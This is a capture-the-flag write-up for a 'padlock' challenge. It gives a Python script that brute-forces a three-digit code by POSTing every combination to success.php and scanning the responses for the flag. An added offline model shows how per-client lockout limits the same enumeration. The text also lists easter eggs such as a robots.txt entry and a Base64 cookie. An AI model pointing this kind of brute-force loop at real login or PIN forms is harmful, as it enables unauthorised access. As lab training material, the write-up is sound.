# CHALLENGE padlock
## Writeup
To get the flag, a 3-digit code has to be found. As 3 digits only offer 999 combinations, brute force is the way to go.

In the source code of `index.php`, we can see that for each try, a POST request is sent to `success.php`. The POST request contains 3 values: `try100`, `try10` and `try1`. In the brute force we have to enumerate each value from 0 to 9. We can check each response for the flag by looking for `IG{`. If we get a match, the response might contain a flag.

A simple brute-force program in Python would look like this:

```python
import requests

# Change this to the full URL of success.php on the challenge host
# (placeholder value; requests needs a scheme and a host).
url = "http://<challenge-host>/success.php"


def checkForSolution(text):
    # Look for the flag prefix in the response body.
    if text.find("IG{") == -1:
        return False
    else:
        # Print everything from "IG{" up to and including the closing brace.
        substr = text.find("IG{")
        print(text[substr:text.find("}", substr) + 1])
        return True


def bruteForce():
    # Enumerate the hundreds, tens and units digits from 0 to 9.
    for h in range(10):
        for t in range(10):
            for u in range(10):
                param = {'try100': h, 'try10': t, 'try1': u}
                req = requests.post(url, data=param)
                print("try:", h, t, u)
                if checkForSolution(req.text):
                    return True
    return False


bruteForce()
```
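
The enumeration above succeeds because `success.php` evaluates every guess it receives. The following is an added example, not part of the original writeup or the challenge's code: an offline model of the same endpoint with a per-client attempt limiter, replaying the 000..999 enumeration against it. The class `PadlockServer`, the function `enumerate_codes`, the policy values (5 failures, 900-second lockout), the secret code, the flag and the client address are all assumptions made for illustration.

```python
import itertools


class PadlockServer:
    """Hypothetical stand-in for success.php with per-client throttling."""

    def __init__(self, secret, flag, max_failures=5, lockout_seconds=900):
        self.secret = secret                  # (try100, try10, try1)
        self.flag = flag
        self.max_failures = max_failures      # assumed policy values
        self.lockout_seconds = lockout_seconds
        self.failures = {}                    # client -> failed guesses so far
        self.locked_until = {}                # client -> unlock time (seconds)

    def submit(self, client, guess, now):
        """Handle one guess at time `now`; return (status, body)."""
        if now < self.locked_until.get(client, 0):
            return 429, "locked out"          # rejected before any comparison
        if guess == self.secret:
            self.failures.pop(client, None)
            return 200, self.flag
        self.failures[client] = self.failures.get(client, 0) + 1
        if self.failures[client] >= self.max_failures:
            self.locked_until[client] = now + self.lockout_seconds
            self.failures[client] = 0
        return 200, "wrong code"


def enumerate_codes(server, client, seconds_per_try=1):
    """Replay the 000..999 enumeration; return (evaluated, rejected, found)."""
    evaluated = rejected = 0
    for i, guess in enumerate(itertools.product(range(10), repeat=3)):
        status, body = server.submit(client, guess, now=i * seconds_per_try)
        if status == 429:
            rejected += 1
            continue
        evaluated += 1
        if body == server.flag:
            return evaluated, rejected, True
    return evaluated, rejected, False


if __name__ == "__main__":
    # Constructed secret, flag and client address, for illustration only.
    flag = "IG{constructed_example}"
    open_server = PadlockServer((7, 4, 2), flag, max_failures=10**6)
    print("no limit: ", enumerate_codes(open_server, "203.0.113.5"))
    limited = PadlockServer((7, 4, 2), flag)
    print("throttled:", enumerate_codes(limited, "203.0.113.5"))
```

Throttling only bounds the guess rate; a three-digit keyspace stays small, so a longer code is the stronger control.
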
## Easter eggs
In `robots.txt`, the file `flag.txt` is disallowed; this file contains ASCII art of a beautiful flag.

Trying combinations like '420' or '069' will redirect to a new page. A cookie is also placed, and as long as this cookie exists, the index page shows a 4-digit combination. However, this newly placed digit does not do anything.

The cookie that is placed contains a Base64 string.